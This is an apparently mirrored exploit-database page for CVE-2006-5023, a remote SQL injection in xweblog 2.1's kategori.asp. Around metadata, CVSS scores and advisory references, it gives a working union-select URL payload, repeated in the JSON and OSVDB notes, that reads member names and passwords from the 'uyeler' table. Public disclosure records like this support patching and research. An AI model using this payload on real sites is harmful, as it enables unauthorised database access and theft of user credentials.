Search...

xweblog <= 2.1 kategori.asp Remote SQL Injection Vulnerability

2006-09-22T00:00:00

ID EDB-ID:2416
Type exploitdb
Reporter Muhacir
Modified 2006-09-22T00:00:00

Description

xweblog <= 2.1 (kategori.asp) Remote SQL Injection Vulnerability. CVE-2006-5023. Webapps exploit for asp platform

                                        
                                            # xweblog &lt;= 2.1 (tr) (kategori.asp)Remote SQL Injection Vulnerability

# Author : Muhacir

# Source : http://www.aspindir.com/goster/4386

# Exploit : http://www.victim.com/[xweblog path]/kategori.asp?kategori=-1%20union%20select%200,ad,2,3,4,5,6,7,8,9,sifre,11,12%20from%20uyeler

# Greetz To : str0ke :)

# milw0rm.com [2006-09-22]

JSON Vulners Source

Initial Source

{"hash": "40987e5a18bd2cae2e5dc0a7425129f3d3bd2c13070d1759c6c5c5ba9e1871c9", "id": "EDB-ID:2416", "lastseen": "2016-01-31T16:12:41", "enchantments": {"vulnersScore": 7.5}, "bulletinFamily": "exploit", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "edition": 1, "history": [], "type": "exploitdb", "sourceHref": "https://www.exploit-db.com/download/2416/", "description": "xweblog <= 2.1 (kategori.asp) Remote SQL Injection Vulnerability. CVE-2006-5023. Webapps exploit for asp platform", "title": "xweblog <= 2.1 kategori.asp Remote SQL Injection Vulnerability", "sourceData": "# xweblog <= 2.1 (tr) (kategori.asp)Remote SQL Injection Vulnerability\n\n# Author : Muhacir\n\n# Source : http://www.aspindir.com/goster/4386\n\n# Exploit : http://www.victim.com/[xweblog path]/kategori.asp?kategori=-1%20union%20select%200,ad,2,3,4,5,6,7,8,9,sifre,11,12%20from%20uyeler\n\n# Greetz To : str0ke :)\n\n# milw0rm.com [2006-09-22]\n", "objectVersion": "1.0", "cvelist": ["CVE-2006-5023"], "published": "2006-09-22T00:00:00", "osvdbidlist": ["29103"], "references": [], "reporter": "Muhacir", "modified": "2006-09-22T00:00:00", "href": "https://www.exploit-db.com/exploits/2416/"}

{"result": {"cve": [{"id": "CVE-2006-5023", "type": "cve", "title": "CVE-2006-5023", "description": "SQL injection vulnerability in kategori.asp in xweblog 2.1 and earlier allows remote attackers to execute arbitrary SQL commands via the kategori parameter.", "published": "2006-09-27T19:07:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-5023", "cvelist": ["CVE-2006-5023"], "lastseen": "2017-10-19T11:12:32"}], "osvdb": [{"id": "OSVDB:29103", "type": "osvdb", "title": "xweblog kategori.asp kategori Variable SQL Injection", "description": "## Manual Testing Notes\nhttp://[target]/[xweblog path]/kategori.asp?kategori=-1%20union%20select%200,ad,2,3,4,5,6,7,8,9,sifre,11,12%20from%20uyeler\n## References:\nVendor URL: http://www.aspindir.com/goster/4386\n[Secunia Advisory ID:22052](https://secuniaresearch.flexerasoftware.com/advisories/22052/)\nGeneric Exploit URL: http://milw0rm.com/exploits/2416\nFrSIRT Advisory: ADV-2006-3762\n[CVE-2006-5023](https://vulners.com/cve/CVE-2006-5023)\nBugtraq ID: 20145\n", "published": "2006-09-22T04:37:01", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/osvdb/OSVDB:29103", "cvelist": ["CVE-2006-5023"], "lastseen": "2017-04-28T13:20:25"}]}}

xweblog &lt;= 2.1 kategori.asp Remote SQL Injection Vulnerability

Description

xweblog <= 2.1 (kategori.asp) Remote SQL Injection Vulnerability. CVE-2006-5023. Webapps exploit for asp platform

xweblog <= 2.1 kategori.asp Remote SQL Injection Vulnerability